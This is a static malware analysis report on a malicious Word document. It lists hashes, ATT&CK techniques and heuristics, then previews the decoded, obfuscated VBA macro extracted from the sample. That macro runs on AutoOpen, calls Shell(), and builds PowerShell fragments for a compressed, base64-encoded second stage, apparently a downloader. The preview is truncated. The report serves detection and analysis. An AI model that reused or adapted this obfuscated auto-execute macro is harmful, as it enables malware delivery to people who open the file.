Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1baf8d17d7c2c257…

MALICIOUS

Office (OLE)

130.0 KB Created: 2018-05-23 13:41:00 Authoring application: Microsoft Office Word First seen: 2018-06-14
MD5: 889ff557c0b7d7606096a1d08087933f SHA-1: 691e96e04733d632c16c1a0e2fe2e0a73e299573 SHA-256: 1baf8d17d7c2c25714c1ecbc70e90c1d185e50626d53b39110799bffea16a699
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function, indicating it is designed to run automatically upon opening. The macro utilizes a Shell() call and constructs obfuscated strings that appear to be related to downloading and executing a second-stage payload. The specific strings like 'i3rshell zOAoW4rYcfwezHJXCKDZ-jCFZva' and '6c25x-oBjECT io.CoHmpReSZTjCFZvaven2Ph.DlcrKGWfoCzujmP' suggest a downloader functionality.

Heuristics 5

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 129529 bytes
SHA-256: 8802270af3e0422a8f28673597da8b0de3003ad1894b75407e4c27ea0320e655
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "IsOMqNqqiQsr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function OOuXFkPDirT()

On Error Resume Next
thUrTfb = OJDBDRch + CSng(687366) + 796075 / Sin(122938 - CByte(981610) / 997252 - Round(687366)) + zJJYEU * JLDZvtw - (796075 + 122938 + 981610 - 6873660)
Set QCQvAA = KiYlSvE
ORscZKZElz = "i3rshell zOAoW4rYcfwezHJXCKDZ-jCFZva"
YUccGtGJ = CStr(Left(Right(ORscZKZElz, 24), 1)) + Left(Right(ORscZKZElz, 17), 2) + CStr(Left(Right(ORscZKZElz, 34), 5)) + CStr(Left(Right(ORscZKZElz, 29), 2)) + CStr(Left(Right(ORscZKZElz, 7), 1)) + Left(Right(ORscZKZElz, 23), 1)

XRzlPRwQzF = "i3wsTyleA hAdj4iYdfaUzHJnDoDZTjCFZvaidJ2PhsWl"
ZGmFM = CStr(Left(Right(XRzlPRwQzF, 30), 1)) + Left(Right(XRzlPRwQzF, 21), 3) + CStr(Left(Right(XRzlPRwQzF, 43), 6)) + Left(Right(XRzlPRwQzF, 36), 2) + CStr(Left(Right(XRzlPRwQzF, 9), 2)) + CStr(Left(Right(XRzlPRwQzF, 28), 1))

YRiGiSl = "6c25x-oBjECT  io.CoHmpReSZTjCFZvaven2Ph.DlcrKGWfoCzujmP ( nEWFBv4oTvfIdBmEkYuKzw2oSIoNCoWKsJWJBGZhmWmb"
aanVFbhm = CStr(Left(Right(YRiGiSl, 68), 2)) + CStr(Left(Right(YRiGiSl, 47), 6)) + CStr(Left(Right(YRiGiSl, 97), 14)) + CStr(Left(Right(YRiGiSl, 82), 5)) + Left(Right(YRiGiSl, 20), 4) + CStr(Left(Right(YRiGiSl, 63), 2)) + CStr(Left(Right(YRiGiSl, 29), 1))

kmSEElidsi = "i3esTREAM([Adj4rFc.aUzHJXCLATTjCFZvavtJiohsWlcrK"
kzEiK = CStr(Left(Right(kmSEElidsi, 32), 1)) + CStr(Left(Right(kmSEElidsi, 22), 3)) + CStr(Left(Right(kmSEElidsi, 46), 7)) + CStr(Left(Right(kmSEElidsi, 39), 2)) + Left(Right(kmSEElidsi, 9), 2) + Left(Right(kmSEElidsi, 30), 1)

GzYtSIDqouJ = "3i6rySTReAMdj4rYcfMUz][SCKDZTeMoZvavysTPhsWlcrKGWfoCzu"
hnqEPHvL = CStr(Left(Right(GzYtSIDqouJ, 36), 1)) + CStr(Left(Right(GzYtSIDqouJ, 25), 3)) + CStr(Left(Right(GzYtSIDqouJ, 51), 8)) + Left(Right(GzYtSIDqouJ, 33), 3) + Left(Right(GzYtSIDqouJ, 18), 3)

EIjTZTMw = "6c25VeRT]::FroMfbASEJXCKDZTeMFZTrvtJ2PhsWlcr.conoCzujmPYQisOgFBv464sfIdBm7kYuKzw2"
EmZisKmlPDJ = CStr(Left(Right(EIjTZTMw, 54), 2)) + Left(Right(EIjTZTMw, 37), 4) + Left(Right(EIjTZTMw, 77), 11) + CStr(Left(Right(EIjTZTMw, 65), 4)) + CStr(Left(Right(EIjTZTMw, 16), 3)) + CStr(Left(Right(EIjTZTMw, 50), 2)) + Left(Right(EIjTZTMw, 24), 1)

ihhKfRmEbb = "Z 'bR6Zr5xNzOAdjG(YcfaUzHTXCKD"
Jidzr = Left(Right(ihhKfRmEbb, 20), 1) + Left(Right(ihhKfRmEbb, 14), 2) + CStr(Left(Right(ihhKfRmEbb, 29), 4)) + CStr(Left(Right(ihhKfRmEbb, 24), 2)) + CStr(Left(Right(ihhKfRmEbb, 5), 1))
wuuzM = fAcYJNEXZZ + CSng(158302) + 786837 / Sin(452645 - CByte(985248) / 497487 - Round(158302)) + mPOaIAs * kTnflQOJzs - (786837 + 452645 + 985248 - 1583020)
Set buvArwzUJj = ZqEvGAEbqtC
TFNLJhT = "Z8PtJ9c259AzOAdtIrYcfaxzHJX"
zITLaHqM = Left(Right(TFNLJhT, 18), 1) + CStr(Left(Right(TFNLJhT, 12), 2)) + CStr(Left(Right(TFNLJhT, 26), 4)) + Left(Right(TFNLJhT, 22), 1) + CStr(Left(Right(TFNLJhT, 5), 1))

PpwTo = Chr(43)
dpbAdwJTKB = "ZTsJvEra5xAsOAdj4r6kfaUzHJX3KDZTj"
XoHizvZoE = Left(Right(dpbAdwJTKB, 22), 1) + CStr(Left(Right(dpbAdwJTKB, 15), 2)) + CStr(Left(Right(dpbAdwJTKB, 32), 5)) + Left(Right(dpbAdwJTKB, 27), 2) + Left(Right(dpbAdwJTKB, 6), 1)

KtLlw = "ZKk0l6Dt5xszOAdjXVYcfaUzHOXCKD"
iNrIY = Left(Right(KtLlw, 20), 1) + Left(Right(KtLlw, 14), 2) + CStr(Left(Right(KtLlw, 29), 4)) + CStr(Left(Right(KtLlw, 24), 2)) + CStr(Left(Right(KtLlw, 5), 1))

BpiBMnoa = "i3i6VEUoZNjHBJIbCsfaUzHJJCKLlTjCFZvavtJdw17WlcrKGWfoCzujmPxlGsOgFBv4oTvf"
lGGXHi = CStr(Left(Right(BpiBMnoa, 48), 1)) + CStr(Left(Right(BpiBMnoa, 33), 4)) + CStr(Left(Right(BpiBMnoa, 68), 10)) + CStr(Left(Right(BpiBMnoa, 58), 4)) + CStr(Left(Right(BpiBMnoa, 14), 3)) + Left(Right(BpiBMnoa, 45), 2)

JiizwB = "3iM7oxD6zOAdjvrCEfaUz9/XCKWzTjCFZvavtJ2"
PlCTdXqDIZl = CStr(Left(Right(JiizwB, 26), 1)) + CStr(Left(Right(JiizwB, 18), 2)) + CStr(Left(Right(JiizwB, 37), 6)) + Left(Right(JiizwB, 24), 2) + CStr(Left(Right(JiizwB, 13), 2))

JCTcl = "i6c257Lb1W178czi8WI2rPJuIXZTjCFZvavt87Phs
... (truncated)